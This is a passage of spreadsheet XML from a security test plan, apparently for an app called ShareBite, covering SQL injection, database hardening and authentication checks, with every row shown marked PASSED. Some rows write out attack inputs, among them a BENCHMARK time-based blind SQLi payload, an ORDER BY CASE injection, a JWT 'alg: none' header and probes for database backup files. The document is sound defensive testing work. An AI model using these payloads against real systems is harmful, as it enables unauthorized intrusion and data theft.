      <c r="A23" s="15" t="inlineStr">
        <is>
          <t>SEC-SQL-022</t>
        </is>
      </c>
      <c r="B23" s="16" t="inlineStr">
        <is>
          <t>SQLi &amp; Database Security</t>
        </is>
      </c>
      <c r="C23" s="16" t="inlineStr">
        <is>
          <t>Time-based Blind SQLi on Password Reset Token</t>
        </is>
      </c>
      <c r="D23" s="16" t="inlineStr">
        <is>
          <t>Inject BENCHMARK(10000000,MD5(1)) in token verification</t>
        </is>
      </c>
      <c r="E23" s="16" t="inlineStr">
        <is>
          <t>Benchmark payload</t>
        </is>
      </c>
      <c r="F23" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G23" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H23" s="16" t="inlineStr">
        <is>
          <t>Query execution aborted; Token validated via constant-time compare</t>
        </is>
      </c>
    </row>
    <row r="24" ht="22" customHeight="1">
      <c r="A24" s="15" t="inlineStr">
        <is>
          <t>SEC-SQL-023</t>
        </is>
      </c>
      <c r="B24" s="16" t="inlineStr">
        <is>
          <t>SQLi &amp; Database Security</t>
        </is>
      </c>
      <c r="C24" s="16" t="inlineStr">
        <is>
          <t>SQLi via HTTP Request Headers</t>
        </is>
      </c>
      <c r="D24" s="16" t="inlineStr">
        <is>
          <t>Inject SQL payload into User-Agent and X-Forwarded-For headers</t>
        </is>
      </c>
      <c r="E24" s="16" t="inlineStr">
        <is>
          <t>Header-based SQLi</t>
        </is>
      </c>
      <c r="F24" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G24" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H24" s="16" t="inlineStr">
        <is>
          <t>Headers sanitized before logging into audit database</t>
        </is>
      </c>
    </row>
    <row r="25" ht="22" customHeight="1">
      <c r="A25" s="15" t="inlineStr">
        <is>
          <t>SEC-SQL-024</t>
        </is>
      </c>
      <c r="B25" s="16" t="inlineStr">
        <is>
          <t>SQLi &amp; Database Security</t>
        </is>
      </c>
      <c r="C25" s="16" t="inlineStr">
        <is>
          <t>Second-Order SQLi on Order Note Field</t>
        </is>
      </c>
      <c r="D25" s="16" t="inlineStr">
        <is>
          <t>Input SQL payload in order notes, trigger invoice generation</t>
        </is>
      </c>
      <c r="E25" s="16" t="inlineStr">
        <is>
          <t>Order notes SQLi</t>
        </is>
      </c>
      <c r="F25" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G25" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H25" s="16" t="inlineStr">
        <is>
          <t>Notes rendered via safe template engine with parameter binding</t>
        </is>
      </c>
    </row>
    <row r="26" ht="22" customHeight="1">
      <c r="A26" s="15" t="inlineStr">
        <is>
          <t>SEC-SQL-025</t>
        </is>
      </c>
      <c r="B26" s="16" t="inlineStr">
        <is>
          <t>SQLi &amp; Database Security</t>
        </is>
      </c>
      <c r="C26" s="16" t="inlineStr">
        <is>
          <t>Database Port Direct Access Prevention</t>
        </is>
      </c>
      <c r="D26" s="16" t="inlineStr">
        <is>
          <t>Attempt direct TCP connection to DB port 5432 from external IP</t>
        </is>
      </c>
      <c r="E26" s="16" t="inlineStr">
        <is>
          <t>External port scan</t>
        </is>
      </c>
      <c r="F26" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G26" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H26" s="16" t="inlineStr">
        <is>
          <t>Database bound to private subnet / 127.0.0.1; Firewall drops connection</t>
        </is>
      </c>
    </row>
    <row r="27" ht="22" customHeight="1">
      <c r="A27" s="15" t="inlineStr">
        <is>
          <t>SEC-SQL-026</t>
        </is>
      </c>
      <c r="B27" s="16" t="inlineStr">
        <is>
          <t>SQLi &amp; Database Security</t>
        </is>
      </c>
      <c r="C27" s="16" t="inlineStr">
        <is>
          <t>Postgres SSL TLS Encryption Enforcement</t>
        </is>
      </c>
      <c r="D27" s="16" t="inlineStr">
        <is>
          <t>Inspect DB connection pool protocol settings</t>
        </is>
      </c>
      <c r="E27" s="16" t="inlineStr">
        <is>
          <t>SSL Mode check</t>
        </is>
      </c>
      <c r="F27" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G27" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H27" s="16" t="inlineStr">
        <is>
          <t>db connection string specifies sslmode=require &amp; TLS 1.3 enforced</t>
        </is>
      </c>
    </row>
    <row r="28" ht="22" customHeight="1">
      <c r="A28" s="15" t="inlineStr">
        <is>
          <t>SEC-SQL-027</t>
        </is>
      </c>
      <c r="B28" s="16" t="inlineStr">
        <is>
          <t>SQLi &amp; Database Security</t>
        </is>
      </c>
      <c r="C28" s="16" t="inlineStr">
        <is>
          <t>Database Password Hash Security</t>
        </is>
      </c>
      <c r="D28" s="16" t="inlineStr">
        <is>
          <t>Inspect database user table records</t>
        </is>
      </c>
      <c r="E28" s="16" t="inlineStr">
        <is>
          <t>Hash format audit</t>
        </is>
      </c>
      <c r="F28" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G28" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H28" s="16" t="inlineStr">
        <is>
          <t>Passwords hashed using bcrypt with salt rounds &gt;= 12; Plaintext absent</t>
        </is>
      </c>
    </row>
    <row r="29" ht="22" customHeight="1">
      <c r="A29" s="15" t="inlineStr">
        <is>
          <t>SEC-SQL-028</t>
        </is>
      </c>
      <c r="B29" s="16" t="inlineStr">
        <is>
          <t>SQLi &amp; Database Security</t>
        </is>
      </c>
      <c r="C29" s="16" t="inlineStr">
        <is>
          <t>PreparedStatement Caching Pollution Check</t>
        </is>
      </c>
      <c r="D29" s="16" t="inlineStr">
        <is>
          <t>Send 1000 unique malformed query parameters</t>
        </is>
      </c>
      <c r="E29" s="16" t="inlineStr">
        <is>
          <t>Cache pollution payload</t>
        </is>
      </c>
      <c r="F29" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G29" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H29" s="16" t="inlineStr">
        <is>
          <t>Prepared statements use parameterized templates without string concat</t>
        </is>
      </c>
    </row>
    <row r="30" ht="22" customHeight="1">
      <c r="A30" s="15" t="inlineStr">
        <is>
          <t>SEC-SQL-029</t>
        </is>
      </c>
      <c r="B30" s="16" t="inlineStr">
        <is>
          <t>SQLi &amp; Database Security</t>
        </is>
      </c>
      <c r="C30" s="16" t="inlineStr">
        <is>
          <t>JSON B-Tree Index Injection Check</t>
        </is>
      </c>
      <c r="D30" s="16" t="inlineStr">
        <is>
          <t>Send malformed JSON key in JSONB query parameter</t>
        </is>
      </c>
      <c r="E30" s="16" t="inlineStr">
        <is>
          <t>JSONB key injection</t>
        </is>
      </c>
      <c r="F30" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G30" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H30" s="16" t="inlineStr">
        <is>
          <t>JSON keys strictly validated against JSON schema specification</t>
        </is>
      </c>
    </row>
    <row r="31" ht="22" customHeight="1">
      <c r="A31" s="15" t="inlineStr">
        <is>
          <t>SEC-SQL-030</t>
        </is>
      </c>
      <c r="B31" s="16" t="inlineStr">
        <is>
          <t>SQLi &amp; Database Security</t>
        </is>
      </c>
      <c r="C31" s="16" t="inlineStr">
        <is>
          <t>Blind SQLi on Sorting Order Parameter</t>
        </is>
      </c>
      <c r="D31" s="16" t="inlineStr">
        <is>
          <t>Pass ORDER BY (SELECT CASE WHEN (1=1) THEN name ELSE id END)</t>
        </is>
      </c>
      <c r="E31" s="16" t="inlineStr">
        <is>
          <t>Order by payload</t>
        </is>
      </c>
      <c r="F31" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G31" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H31" s="16" t="inlineStr">
        <is>
          <t>Column sort fields validated against strict allowed field array</t>
        </is>
      </c>
    </row>
    <row r="32" ht="22" customHeight="1">
      <c r="A32" s="15" t="inlineStr">
        <is>
          <t>SEC-SQL-031</t>
        </is>
      </c>
      <c r="B32" s="16" t="inlineStr">
        <is>
          <t>SQLi &amp; Database Security</t>
        </is>
      </c>
      <c r="C32" s="16" t="inlineStr">
        <is>
          <t>DB Backup File Exposure Check</t>
        </is>
      </c>
      <c r="D32" s="16" t="inlineStr">
        <is>
          <t>Request GET /backup.sql, /dump.db, /db.tar.gz via HTTP</t>
        </is>
      </c>
      <c r="E32" s="16" t="inlineStr">
        <is>
          <t>Backup file paths</t>
        </is>
      </c>
      <c r="F32" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G32" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H32" s="16" t="inlineStr">
        <is>
          <t>Web root contains no database dumps; Static server returns 404</t>
        </is>
      </c>
    </row>
    <row r="33" ht="22" customHeight="1">
      <c r="A33" s="15" t="inlineStr">
        <is>
          <t>SEC-SQL-032</t>
        </is>
      </c>
      <c r="B33" s="16" t="inlineStr">
        <is>
          <t>SQLi &amp; Database Security</t>
        </is>
      </c>
      <c r="C33" s="16" t="inlineStr">
        <is>
          <t>Read-Only DB Replica Escalation Prevention</t>
        </is>
      </c>
      <c r="D33" s="16" t="inlineStr">
        <is>
          <t>Send write query to read-replica endpoint</t>
        </is>
      </c>
      <c r="E33" s="16" t="inlineStr">
        <is>
          <t>Write on read-only node</t>
        </is>
      </c>
      <c r="F33" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G33" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H33" s="16" t="inlineStr">
        <is>
          <t>Read-replica rejects DML statements with 403 Read-Only error</t>
        </is>
      </c>
    </row>
    <row r="34" ht="22" customHeight="1">
      <c r="A34" s="15" t="inlineStr">
        <is>
          <t>SEC-SQL-033</t>
        </is>
      </c>
      <c r="B34" s="16" t="inlineStr">
        <is>
          <t>SQLi &amp; Database Security</t>
        </is>
      </c>
      <c r="C34" s="16" t="inlineStr">
        <is>
          <t>SQL Wildcard Injection in LIKE Clause</t>
        </is>
      </c>
      <c r="D34" s="16" t="inlineStr">
        <is>
          <t>Search for %%%% or ____ in search input</t>
        </is>
      </c>
      <c r="E34" s="16" t="inlineStr">
        <is>
          <t>Wildcard search payload</t>
        </is>
      </c>
      <c r="F34" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G34" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H34" s="16" t="inlineStr">
        <is>
          <t>LIKE wildcards escaped (% -&gt; \%, _ -&gt; \_); Constant search time</t>
        </is>
      </c>
    </row>
    <row r="35" ht="22" customHeight="1">
      <c r="A35" s="15" t="inlineStr">
        <is>
          <t>SEC-SQL-034</t>
        </is>
      </c>
      <c r="B35" s="16" t="inlineStr">
        <is>
          <t>SQLi &amp; Database Security</t>
        </is>
      </c>
      <c r="C35" s="16" t="inlineStr">
        <is>
          <t>GraphQL Query Depth &amp; Introspection Abuse</t>
        </is>
      </c>
      <c r="D35" s="16" t="inlineStr">
        <is>
          <t>Send nested GraphQL query 100 levels deep</t>
        </is>
      </c>
      <c r="E35" s="16" t="inlineStr">
        <is>
          <t>Deep nested query</t>
        </is>
      </c>
      <c r="F35" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G35" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H35" s="16" t="inlineStr">
        <is>
          <t>Query depth limited to 5 levels; Introspection disabled in prod</t>
        </is>
      </c>
    </row>
    <row r="36" ht="22" customHeight="1">
      <c r="A36" s="15" t="inlineStr">
        <is>
          <t>SEC-SQL-035</t>
        </is>
      </c>
      <c r="B36" s="16" t="inlineStr">
        <is>
          <t>SQLi &amp; Database Security</t>
        </is>
      </c>
      <c r="C36" s="16" t="inlineStr">
        <is>
          <t>SQL Connection Pool Exhaustion Protection</t>
        </is>
      </c>
      <c r="D36" s="16" t="inlineStr">
        <is>
          <t>Simulate 500 concurrent connections sending unclosed transactions</t>
        </is>
      </c>
      <c r="E36" s="16" t="inlineStr">
        <is>
          <t>Pool exhaustion</t>
        </is>
      </c>
      <c r="F36" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G36" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H36" s="16" t="inlineStr">
        <is>
          <t>Connection timeout set to 5s; Idle connections automatically reclaimed</t>
        </is>
      </c>
    </row>
    <row r="37" ht="22" customHeight="1">
      <c r="A37" s="15" t="inlineStr">
        <is>
          <t>SEC-AUTH-001</t>
        </is>
      </c>
      <c r="B37" s="16" t="inlineStr">
        <is>
          <t>Broken Authentication &amp; Sessions</t>
        </is>
      </c>
      <c r="C37" s="16" t="inlineStr">
        <is>
          <t>Brute Force Attack Protection on Login Endpoint</t>
        </is>
      </c>
      <c r="D37" s="16" t="inlineStr">
        <is>
          <t>Send 50 failed login attempts for donor@sharebite.org in 1 minute</t>
        </is>
      </c>
      <c r="E37" s="16" t="inlineStr">
        <is>
          <t>Automated HTTP POST rate burst</t>
        </is>
      </c>
      <c r="F37" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G37" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H37" s="16" t="inlineStr">
        <is>
          <t>Account locked after 5 failed attempts; IP rate limited via 429 Too Many Requests</t>
        </is>
      </c>
    </row>
    <row r="38" ht="22" customHeight="1">
      <c r="A38" s="15" t="inlineStr">
        <is>
          <t>SEC-AUTH-002</t>
        </is>
      </c>
      <c r="B38" s="16" t="inlineStr">
        <is>
          <t>Broken Authentication &amp; Sessions</t>
        </is>
      </c>
      <c r="C38" s="16" t="inlineStr">
        <is>
          <t>Password Complexity Policy Enforcement</t>
        </is>
      </c>
      <c r="D38" s="16" t="inlineStr">
        <is>
          <t>Register new user with password '123456' or 'password'</t>
        </is>
      </c>
      <c r="E38" s="16" t="inlineStr">
        <is>
          <t>Weak passwords</t>
        </is>
      </c>
      <c r="F38" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G38" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H38" s="16" t="inlineStr">
        <is>
          <t>Registration rejected with message 'Password requires 8+ chars, uppercase, digit, special char'</t>
        </is>
      </c>
    </row>
    <row r="39" ht="22" customHeight="1">
      <c r="A39" s="15" t="inlineStr">
        <is>
          <t>SEC-AUTH-003</t>
        </is>
      </c>
      <c r="B39" s="16" t="inlineStr">
        <is>
          <t>Broken Authentication &amp; Sessions</t>
        </is>
      </c>
      <c r="C39" s="16" t="inlineStr">
        <is>
          <t>Session Token High Entropy Verification</t>
        </is>
      </c>
      <c r="D39" s="16" t="inlineStr">
        <is>
          <t>Analyze generated JWT authentication tokens</t>
        </is>
      </c>
      <c r="E39" s="16" t="inlineStr">
        <is>
          <t>Entropy analysis of JWT</t>
        </is>
      </c>
      <c r="F39" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G39" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H39" s="16" t="inlineStr">
        <is>
          <t>Tokens generated with cryptographically secure random secret (256-bit entropy)</t>
        </is>
      </c>
    </row>
    <row r="40" ht="22" customHeight="1">
      <c r="A40" s="15" t="inlineStr">
        <is>
          <t>SEC-AUTH-004</t>
        </is>
      </c>
      <c r="B40" s="16" t="inlineStr">
        <is>
          <t>Broken Authentication &amp; Sessions</t>
        </is>
      </c>
      <c r="C40" s="16" t="inlineStr">
        <is>
          <t>JWT Signature Validation Verification</t>
        </is>
      </c>
      <c r="D40" s="16" t="inlineStr">
        <is>
          <t>Modify JWT header/payload and send request with altered signature</t>
        </is>
      </c>
      <c r="E40" s="16" t="inlineStr">
        <is>
          <t>Tampered JWT payload</t>
        </is>
      </c>
      <c r="F40" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G40" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H40" s="16" t="inlineStr">
        <is>
          <t>Server validates HMAC-SHA256 signature; returns 401 Unauthorized</t>
        </is>
      </c>
    </row>
    <row r="41" ht="22" customHeight="1">
      <c r="A41" s="15" t="inlineStr">
        <is>
          <t>SEC-AUTH-005</t>
        </is>
      </c>
      <c r="B41" s="16" t="inlineStr">
        <is>
          <t>Broken Authentication &amp; Sessions</t>
        </is>
      </c>
      <c r="C41" s="16" t="inlineStr">
        <is>
          <t>JWT None Algorithm Attack Prevention</t>
        </is>
      </c>
      <c r="D41" s="16" t="inlineStr">
        <is>
          <t>Send JWT token header with {"alg": "none"}</t>
        </is>
      </c>
      <c r="E41" s="16" t="inlineStr">
        <is>
          <t>jwt.header.alg = none</t>
        </is>
      </c>
      <c r="F41" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G41" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H41" s="16" t="inlineStr">
        <is>
          <t>Algorithm 'none' explicitly rejected by JWT verification middleware</t>
        </is>
      </c>
    </row>
    <row r="42" ht="22" customHeight="1">
      <c r="A42" s="15" t="inlineStr">
        <is>
          <t>SEC-AUTH-006</t>
        </is>
      </c>
      <c r="B42" s="16" t="inlineStr">
        <is>
          <t>Broken Authentication &amp; Sessions</t>
        </is>
      </c>
      <c r="C42" s="16" t="inlineStr">
        <is>
          <t>Session Invalidation upon Logout</t>
        </is>
      </c>
      <c r="D42" s="16" t="inlineStr">
        <is>
          <t>Use JWT token after calling POST /api/auth/logout</t>
        </is>
      </c>
      <c r="E42" s="16" t="inlineStr">
        <is>
          <t>Reuse post-logout token</t>
        </is>
      </c>
      <c r="F42" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G42" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H42" s="16" t="inlineStr">
        <is>
          <t>Token added to server-side revocation blacklist / Redis blocklist; 401 Returned</t>
        </is>
      </c>
    </row>
    <row r="43" ht="22" customHeight="1">
      <c r="A43" s="15" t="inlineStr">
        <is>
          <t>SEC-AUTH-007</t>
        </is>
      </c>
      <c r="B43" s="16" t="inlineStr">
        <is>
          <t>Broken Authentication &amp; Sessions</t>
        </is>
      </c>
      <c r="C43" s="16" t="inlineStr">
        <is>
          <t>Concurrent Login Handling &amp; Session Fixation</t>
        </is>
      </c>
      <c r="D43" s="16" t="inlineStr">
        <is>
          <t>Authenticate user, copy session token, login from second device</t>
        </is>
      </c>
      <c r="E43" s="16" t="inlineStr">
        <is>
          <t>Session fixation check</t>
        </is>
      </c>
      <c r="F43" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G43" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H43" s="16" t="inlineStr">
        <is>
          <t>New session ID issued; Old session terminated securely</t>
        </is>
      </c>
    </row>
    <row r="44" ht="22" customHeight="1">
      <c r="A44" s="15" t="inlineStr">
        <is>
          <t>SEC-AUTH-008</t>
        </is>
      </c>
      <c r="B44" s="16" t="inlineStr">
        <is>
          <t>Broken Authentication &amp; Sessions</t>
        </is>
      </c>
      <c r="C44" s="16" t="inlineStr">
        <is>
          <t>Password Reset Token Single-Use Enforcement</t>
        </is>
      </c>
      <c r="D44" s="16" t="inlineStr">
        <is>
          <t>Use password reset link token twice</t>
        </is>
      </c>
      <c r="E44" s="16" t="inlineStr">
        <is>
          <t>Replayed reset token</t>
        </is>
      </c>
      <c r="F44" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G44" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H44" s="16" t="inlineStr">
        <is>
          <t>Token invalidated immediately upon first use; Second attempt rejected</t>
        </is>
      </c>
    </row>
    <row r="45" ht="22" customHeight="1">
      <c r="A45" s="15" t="inlineStr">
        <is>
          <t>SEC-AUTH-009</t>
        </is>
      </c>
      <c r="B45" s="16" t="inlineStr">
        <is>
          <t>Broken Authentication &amp; Sessions</t>
        </is>
      </c>
      <c r="C45" s="16" t="inlineStr">
        <is>
          <t>Password Reset Token Expiration Check</t>
        </is>
      </c>
      <c r="D45" s="16" t="inlineStr">
        <is>
          <t>Use password reset token after 15 minutes</t>
        </is>
      </c>
      <c r="E45" s="16" t="inlineStr">
        <is>
          <t>Expired token</t>
        </is>
      </c>
      <c r="F45" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G45" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H45" s="16" t="inlineStr">
        <is>
          <t>Token expires after 10 minutes; Expiration enforced with 400 Expired Token</t>
        </is>
      </c>
    </row>
    <row r="46" ht="22" customHeight="1">
      <c r="A46" s="15" t="inlineStr">
        <is>
          <t>SEC-AUTH-010</t>
        </is>
      </c>
      <c r="B46" s="16" t="inlineStr">
        <is>
          <t>Broken Authentication &amp; Sessions</t>
        </is>
      </c>
      <c r="C46" s="16" t="inlineStr">
        <is>
          <t>Credential Stuffing Prevention via Captcha</t>
        </is>
      </c>
      <c r="D46" s="16" t="inlineStr">
        <is>
          <t>Simulate credential stuffing attack using 100 IP proxies</t>
        </is>
      </c>
      <c r="E46" s="16" t="inlineStr">
        <is>
          <t>Proxy network requests</t>
        </is>
      </c>
      <c r="F46" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G46" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H46" s="16" t="inlineStr">
        <is>
          <t>Behavioral CAPTCHA triggered upon anomaly detection</t>
        </is>
      </c>
    </row>
    <row r="47" ht="22" customHeight="1">
      <c r="A47" s="15" t="inlineStr">
        <is>
          <t>SEC-AUTH-011</t>
        </is>
      </c>
      <c r="B47" s="16" t="inlineStr">
        <is>
          <t>Broken Authentication &amp; Sessions</t>
        </is>
      </c>
      <c r="C47" s="16" t="inlineStr">
        <is>
          <t>Username Enumeration via Login Error Messages</t>
        </is>
      </c>
      <c r="D47" s="16" t="inlineStr">
        <is>
          <t>Login with invalid email vs valid email + wrong password</t>
        </is>
      </c>
      <c r="E47" s="16" t="inlineStr">
        <is>
          <t>Timing &amp; error text check</t>
        </is>
      </c>
      <c r="F47" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G47" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H47" s="16" t="inlineStr">
        <is>
          <t>Generic message returned: 'Invalid email or password'; Identical response time</t>
        </is>
      </c>
    </row>
    <row r="48" ht="22" customHeight="1">
      <c r="A48" s="15" t="inlineStr">
        <is>
          <t>SEC-AUTH-012</t>
        </is>
      </c>
      <c r="B48" s="16" t="inlineStr">
        <is>
          <t>Broken Authentication &amp; Sessions</t>
        </is>
      </c>
      <c r="C48" s="16" t="inlineStr">
        <is>
          <t>Username Enumeration via Forgot Password</t>
        </is>
      </c>
      <c r="D48" s="16" t="inlineStr">
        <is>
          <t>Request password reset for existing vs non-existing email</t>
        </is>
      </c>
      <c r="E48" s="16" t="inlineStr">
        <is>
          <t>Forgot password endpoint</t>
        </is>
      </c>
      <c r="F48" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G48" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H48" s="16" t="inlineStr">
        <is>
          <t>Generic message: 'If an account exists, a reset link has been sent'</t>
        </is>
      </c>
    </row>
    <row r="49" ht="22" customHeight="1">
      <c r="A49" s="15" t="inlineStr">
        <is>
          <t>SEC-AUTH-013</t>
        </is>
      </c>
      <c r="B49" s="16" t="inlineStr">
        <is>
          <t>Broken Authentication &amp; Sessions</t>
        </is>
      </c>
      <c r="C49" s="16" t="inlineStr">
        <is>
          <t>Session Cookie HttpOnly Flag Audit</t>
        </is>
      </c>
      <c r="D49" s="16" t="inlineStr">
        <is>
          <t>Inspect session cookies in HTTP response headers</t>
        </is>
      </c>
      <c r="E49" s="16" t="inlineStr">
        <is>
          <t>DevTools Application Cookies</t>
        </is>
      </c>
      <c r="F49" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G49" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H49" s="16" t="inlineStr">
        <is>
          <t>HttpOnly flag enabled on all session cookies; JavaScript access blocked</t>
        </is>
      </c>
    </row>
    <row r="50" ht="22" customHeight="1">
      <c r="A50" s="15" t="inlineStr">
        <is>
          <t>SEC-AUTH-014</t>
        </is>
      </c>
      <c r="B50" s="16" t="inlineStr">
        <is>
          <t>Broken Authentication &amp; Sessions</t>
        </is>
      </c>
      <c r="C50" s="16" t="inlineStr">
        <is>
          <t>Session Cookie Secure Flag Audit</t>
        </is>
      </c>
      <c r="D50" s="16" t="inlineStr">
        <is>
          <t>Inspect session cookies over HTTPS protocol</t>
        </is>
      </c>
      <c r="E50" s="16" t="inlineStr">
        <is>
          <t>Cookie flags check</t>
        </is>
      </c>
      <c r="F50" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G50" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H50" s="16" t="inlineStr">
        <is>
          <t>Secure flag enabled; Cookies transmitted strictly over encrypted TLS</t>
        </is>
      </c>
    </row>
    <row r="51" ht="22" customHeight="1">
      <c r="A51" s="15" t="inlineStr">
        <is>
          <t>SEC-AUTH-015</t>
        </is>
      </c>
      <c r="B51" s="16" t="inlineStr">
        <is>
          <t>Broken Authentication &amp; Sessions</t>
        </is>
      </c>
      <c r="C51" s="16" t="inlineStr">
        <is>
          <t>Session Cookie SameSite Attribute Check</t>
        </is>
      </c>
      <c r="D51" s="16" t="inlineStr">
        <is>
          <t>Inspect SameSite cookie setting</t>
        </is>
      </c>
      <c r="E51" s="16" t="inlineStr">
        <is>
          <t>SameSite attribute check</t>
        </is>
      </c>
      <c r="F51" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G51" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H51" s="16" t="inlineStr">
        <is>
          <t>SameSite=Lax (or Strict) configured; Cross-site request transmission prevented</t>
        </is>
      </c>
    </row>
    <row r="52" ht="22" customHeight="1">
      <c r="A52" s="15" t="inlineStr">
        <is>
          <t>SEC-AUTH-016</t>
        </is>
      </c>
      <c r="B52" s="16" t="inlineStr">
        <is>
          <t>Broken Authentication &amp; Sessions</t>
        </is>
      </c>
      <c r="C52" s="16" t="inlineStr">
        <is>
          <t>Remember Me Token Security Check</t>
        </is>
      </c>
      <c r="D52" s="16" t="inlineStr">
        <is>
          <t>Inspect 'Remember Me' persistent authentication token</t>
        </is>
      </c>
      <c r="E52" s="16" t="inlineStr">
        <is>
          <t>Remember Me token audit</t>
        </is>
      </c>
      <c r="F52" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G52" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H52" s="16" t="inlineStr">
        <is>
          <t>Uses selector + validator hashed token architecture stored securely</t>
        </is>
      </c>
    </row>
    <row r="53" ht="22" customHeight="1">
      <c r="A53" s="15" t="inlineStr">
        <is>
          <t>SEC-AUTH-017</t>
        </is>
      </c>
      <c r="B53" s="16" t="inlineStr">
        <is>
          <t>Broken Authentication &amp; Sessions</t>
        </is>
      </c>
      <c r="C53" s="16" t="inlineStr">
        <is>
          <t>Multi-Factor Authentication (MFA) Bypass Prevention</t>
        </is>
      </c>
      <c r="D53" s="16" t="inlineStr">
        <is>
          <t>Skip MFA step URL directly to /dashboard after credentials step</t>
        </is>
      </c>
      <c r="E53" s="16" t="inlineStr">
        <is>
          <t>Direct URL navigation</t>
        </is>
      </c>
      <c r="F53" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G53" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H53" s="16" t="inlineStr">
        <is>
          <t>MFA state required in session; Access denied and redirected to MFA challenge</t>
        </is>
      </c>
    </row>
    <row r="54" ht="22" customHeight="1">
      <c r="A54" s="15" t="inlineStr">
        <is>
          <t>SEC-AUTH-018</t>
        </is>
      </c>
      <c r="B54" s="16" t="inlineStr">
        <is>
          <t>Broken Authentication &amp; Sessions</t>
        </is>
      </c>
      <c r="C54" s="16" t="inlineStr">
        <is>
          <t>MFA OTP Code Brute Force Protection</t>
        </is>
      </c>
      <c r="D54" s="16" t="inlineStr">
        <is>
          <t>Send 20 invalid 6-digit OTP codes</t>
        </is>
      </c>
      <c r="E54" s="16" t="inlineStr">
        <is>
